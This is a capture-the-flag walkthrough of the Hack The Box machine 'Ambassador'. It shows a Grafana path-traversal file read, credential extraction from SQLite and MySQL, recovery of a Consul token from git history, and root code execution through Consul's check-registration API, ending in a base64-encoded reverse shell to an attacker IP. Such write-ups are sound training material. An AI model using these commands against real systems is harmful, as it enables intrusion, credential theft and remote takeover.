# Ambassador - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Ambassador is a comfy medium-rated HTB machine created by [DirectRoot](https://app.hackthebox.com/users/24906)

For foothold, we exploit a local file read in Grafana to grab a SQLite 3 database, where we can find MySQL credentials. Those MySQL credentials can then be used to find SSH credentials.  
For root, we use git commits to recover a Consul API token and then use the Consul Check API, which allows us to run arbitrary commands for health checks.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.183
Nmap scan report for 10.10.11.183
Host is up (0.16s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
3306/tcp open  mysql
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,3000,3306 -oN ambassador.nmap 10.10.11.183
Nmap scan report for 10.10.11.183
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
|   256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_  256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open  ppp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 03 Oct 2022 16:25:07 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 03 Oct 2022 16:24:33 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 03 Oct 2022 16:24:39 GMT
|_    Content-Length: 0
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.30-0ubuntu0.20.04.2
|   Thread ID: 10
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, IgnoreSigpipes, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, InteractiveClient, SupportsTransactions, ODBCClient, ConnectWithDatabase, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, FoundRows, LongPassword, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: lRf:baw{)\x04l'9\x06\x1Ay\x16@k\x12
|_  Auth Plugin Name: caching_sha2_password
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
```

Besides the usual SSH (22) and HTTP (80) ports, we also have ports 3000 and 3306 (MySQL) here.

Visiting the website on port 80:

![1](images/1.png)

Clicking on that post takes us to another page:

![2](images/2.png)

It informs us that we can SSH as the user `developer`  
Also, we can conclude that it has been generated with `Hugo 0.94.2` after looking at page source.

On port 3000, we have:

![3](images/3.png)

It is running Grafana v8.2.0 (d7f71e9eae)

## Grafana LFR

Googling for that version, we'd find this blog post:  
<https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/>  
It is an easy-to-exploit LFR. It is perhaps the most popular local file read and path traversal vulnerability because I've seen it in another HTB box and multiple CTFs.

Testing for the exploit, it works:

```console
opcode@parrot$ curl --path-as-is 'http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[--SNIP--]
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
grafana:x:113:118::/usr/share/grafana:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
consul:x:997:997::/home/consul:/bin/false
```

I tried to look at `/etc/apache2/sites-enabled/000-default.conf` and `/etc/nginx/sites-enabled/default` and only found the configs for the Hugo site on port 80.  

```console
opcode@parrot$ curl --path-as-is 'http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../etc/apache2/sites-enabled/000-default.conf'
<VirtualHost *:80>

    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```

I tried to check if there are more Hugo pages but got nothing:

```console
opcode@parrot$ curl --path-as-is 'http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/www/html/index.xml'
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Ambassador Development Server</title>
    <link>https://example.org/</link>
    <description>Recent content on Ambassador Development Server</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 10 Mar 2022 19:01:57 +0000</lastBuildDate><atom:link href="https://example.org/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Welcome to the Ambassador Development Server</title>
      <link>https://example.org/posts/welcome-to-the-ambassador-development-server/</link>
      <pubDate>Thu, 10 Mar 2022 19:01:57 +0000</pubDate>
      
      <guid>https://example.org/posts/welcome-to-the-ambassador-development-server/</guid>
      <description>Hi there! This server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use.
Connecting to this machine Use the developer account to SSH, DevOps will give you the password.</description>
    </item>
    
  </channel>
</rss>
```

Since we have `mysql` port exposed, I guessed that Grafana was using it as the database, and perhaps we could find `mysql` credentials in Grafana configs.

```console
opcode@parrot$  curl --path-as-is 'http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini'
[--SNIP--]

#################################### Paths ####################################
[paths]
# Path to where grafana can store temp files, sessions, and the sqlite3 db (if that is used)
;data = /var/lib/grafana

# Temporary files in `data` directory older than given duration will be removed
;temp_data_lifetime = 24h

# Directory where grafana can store logs
;logs = /var/log/grafana

[--SNIP--]

#################################### Database ####################################
[database]
# You can configure the database connection by specifying type, host, name, user and password
# as separate properties or as on string using the url properties.

# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;host = 127.0.0.1:3306
;name = grafana
;user = root
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password =

[--SNIP--]

# For "sqlite3" only, path relative to data_path setting
;path = grafana.db

[--SNIP--]
```

Sadly, it is using `sqlite3` for database.  
But we can dump the entire sqlite database as it is just a file, and we can read local files.  
The database file is named `grafana.db` and is stored relative to `data_path`, which is `/var/lib/grafana`

```console
opcode@parrot$ curl --path-as-is 'http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db' -o graphana.db
```

## Exploring sqlite database

We can load the file with:

```console
opcode@parrot$ sqlite3 graphana.db
```

We can see all tables with:

```console
sqlite> .tables
alert                       login_attempt             
alert_configuration         migration_log             
alert_instance              ngalert_configuration     
alert_notification          org                       
alert_notification_state    org_user                  
alert_rule                  playlist                  
alert_rule_tag              playlist_item             
alert_rule_version          plugin_setting            
annotation                  preferences               
annotation_tag              quota                     
api_key                     server_lock               
cache_data                  session                   
dashboard                   short_url                 
dashboard_acl               star                      
dashboard_provisioning      tag                       
dashboard_snapshot          team                      
dashboard_tag               team_member               
dashboard_version           temp_user                 
data_source                 test_data                 
kv_store                    user                      
library_element             user_auth                 
library_element_connection  user_auth_token           
```

The `user` table looks interesting.

```console
sqlite> select * from user;
1|0|admin|admin@localhost||dad0e56900c3be93ce114804726f78c91e82a0f0f0f6b248da419a0cac6157e02806498f1f784146715caee5bad1506ab069|0X27trve2u|f960YdtaMF||1|1|0||2022-03-13 20:26:45|2022-09-01 22:39:38|0|2022-09-14 16:44:19|0
```

We can determine the hash type by going through the Grafana source code.  
But while exploring the database more, I found something interesting in the `data_source` table:

```console
sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-03 08:27:47|0|{}|1|uKewFgM4z
```

We can look at the schema with:

```console
sqlite> .schema data_source
CREATE TABLE `data_source` (
`id` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL
, `org_id` INTEGER NOT NULL
, `version` INTEGER NOT NULL
, `type` TEXT NOT NULL
, `name` TEXT NOT NULL
, `access` TEXT NOT NULL
, `url` TEXT NOT NULL
, `password` TEXT NULL
, `user` TEXT NULL
, `database` TEXT NULL
, `basic_auth` INTEGER NOT NULL
, `basic_auth_user` TEXT NULL
, `basic_auth_password` TEXT NULL
, `is_default` INTEGER NOT NULL
, `json_data` TEXT NULL
, `created` DATETIME NOT NULL
, `updated` DATETIME NOT NULL
, `with_credentials` INTEGER NOT NULL DEFAULT 0, `secure_json_data` TEXT NULL, `read_only` INTEGER NULL, `uid` TEXT NOT NULL DEFAULT 0);
CREATE INDEX `IDX_data_source_org_id` ON `data_source` (`org_id`);
CREATE UNIQUE INDEX `UQE_data_source_org_id_name` ON `data_source` (`org_id`,`name`);
CREATE UNIQUE INDEX `UQE_data_source_org_id_uid` ON `data_source` (`org_id`,`uid`);
CREATE INDEX `IDX_data_source_org_id_is_default` ON `data_source` (`org_id`,`is_default`);
```

We have the username `grafana`, password `dontStandSoCloseToMe63221!` and database `grafana`  
Perhaps we can use the credentials on `mysql`

## Exploring mysql

```console
opcode@parrot$ mysql -h 10.10.11.183 --user=grafana --password='dontStandSoCloseToMe63221!'
```

Let us look at the databases:

```console
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| grafana            |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| whackywidget       |
+--------------------+
```

`grafana` is empty, and `whackywidget` is uncommon.

```console
mysql> use whackywidget;
mysql> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
```

```console
mysql> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
```

Seems like a base64 encoded string.

```console
opcode@parrot$ echo YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== | base64 -d
anEnglishManInNewYork027468
```

We have another pair of credentials now:

```text
developer:anEnglishManInNewYork027468
```

## Recovering deleted API Token from git commits

The obtained credentials work on SSH:

```console
opcode@parrot$ sshpass -p 'anEnglishManInNewYork027468' ssh -o StrictHostKeyChecking=no developer@10.10.11.183
```

In the home directory, we have a `.gitconfig` file.

```console
developer@ambassador:~$ cat ~/.gitconfig 
[user]
    name = Developer
    email = developer@ambassador.local
[safe]
    directory = /opt/my-app
```

`/opt/my-app` is a git repository. In that case, it is always a good idea to look for deleted secrets:

```console
developer@ambassador:/opt/my-app$ git log
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:44:45 2022 +0000

    config script

commit 8dce6570187fd1dcfb127f51f147cd1ca8dc01c6
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 22:47:01 2022 +0000

    created project with django CLI

commit 4b8597b167b2fbf8ec35f992224e612bf28d9e51
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 22:44:11 2022 +0000

    .gitignore
```

Since nothing suggestive jumps out from the commit messages, we can look at changes made in each one.

```console
developer@ambassador:/opt/my-app$ git show 33a53ef9a207976d5ceceddc41a199558843bf3c
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
```

It seems that we have a `consul` token:

```text
bb03b43b-1d81-d62b-24b5-39540ee469b5
```

We can also find the django secret key in `/opt/my-app/whackywidget/whackywidget/settings.py`, but it is irrelevant.  
Multiple services are running locally:

```console
developer@ambassador:~$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8300          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8301          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8302          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8500          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8600          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::3000                 :::*                    LISTEN      -                   
udp        0      0 127.0.0.1:8600          0.0.0.0:*                           -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:8301          0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:8302          0.0.0.0:*                           -                   
```

But I got empty replies from most.

## RCE via Consul Services/Check API

I got empty replies from them all but this one:

```console
developer@ambassador:~$ curl 127.0.0.1:8500
Consul Agent: UI disabled. To enable, set ui_config.enabled=true in the agent configuration and restart.
```

Consul allows us to manage and track different services deployed across the network.

I looked at its API documentation (<https://developer.hashicorp.com/consul/api-docs/api-structure>) to learn how to interact with it:

```console
developer@ambassador:~$ curl -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" http://127.0.0.1:8500/v1/agent/members
[
  {
    "Name": "ambassador",
    "Addr": "127.0.0.1",
    "Port": 8301,
    "Tags": {
      "acls": "1",
      "bootstrap": "1",
      "build": "1.13.2:0e046bbb",
      "dc": "dc1",
      "ft_fs": "1",
      "ft_si": "1",
      "id": "27361fb5-583a-5db0-27bf-ecfed7b4b669",
      "port": "8300",
      "raft_vsn": "3",
      "role": "consul",
      "segment": "",
      "vsn": "2",
      "vsn_max": "3",
      "vsn_min": "2",
      "wan_join_port": "8302"
    },
    "Status": 1,
    "ProtocolMin": 1,
    "ProtocolMax": 5,
    "ProtocolCur": 2,
    "DelegateMin": 2,
    "DelegateMax": 5,
    "DelegateCur": 4
  }
]
```

Googling for exploits, I found this MSF one: <https://www.exploit-db.com/exploits/46074>

Looking closely, it is not a vulnerability but rather a feature that can be abused.  
Basically, `/v1/agent/check/register` allows for registration of a health-check command, which gets executed periodically.  
Although it is a good feature, it can be abused to run arbitrary commands.

We can refer to the documentation at <https://developer.hashicorp.com/consul/api-docs/agent/check#register-check> to structure our requests.

Let us see if there are any already registered checks:

```console
developer@ambassador:~$ curl -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" http://127.0.0.1:8500/v1/agent/checks
{}
```

None so far.  
We can register one:

```console
developer@ambassador:~$ curl -X PUT -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" -H "Content-Type: application/json" -d '{"id": "Opcode", "name": "Opcode", "args": ["sh", "-c", "touch /tmp/opcode"], "interval": "5s", "timeout": "5s"}' http://127.0.0.1:8500/v1/agent/check/register
```

It worked! Let us deregister it first:

```console
developer@ambassador:~$ curl -X PUT -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" http://127.0.0.1:8500/v1/agent/check/deregister/Opcode
```

And now, we can try to get a shell:

```console
developer@ambassador:~$ curl -X PUT -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" -H "Content-Type: application/json" -d '{"id": "Opcode", "name": "Opcode", "args": ["bash", "-c", "echo YmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI5LzkwMDEgICAwPiYx | base64 -d | bash"], "interval": "10s", "timeout": "10s"}' http://127.0.0.1:8500/v1/agent/check/register
```

It gets us a shell but dies as quickly too. We can get around that by setting `timeout` to `5m`

```console
developer@ambassador:~$ curl -X PUT -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" -H "Content-Type: application/json" -d '{"id": "Opcode", "name": "Opcode", "args": ["bash", "-c", "echo YmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI5LzkwMDEgICAwPiYx | base64 -d | bash"], "interval": "10s", "timeout": "5m"}' http://127.0.0.1:8500/v1/agent/check/register
```

And now we get a shell with enough time to read the flag and set up alternatives to maintain better persistence.

```console
root@ambassador:/# id
uid=0(root) gid=0(root) groups=0(root)
```

Remember to deregister the check once you are done.
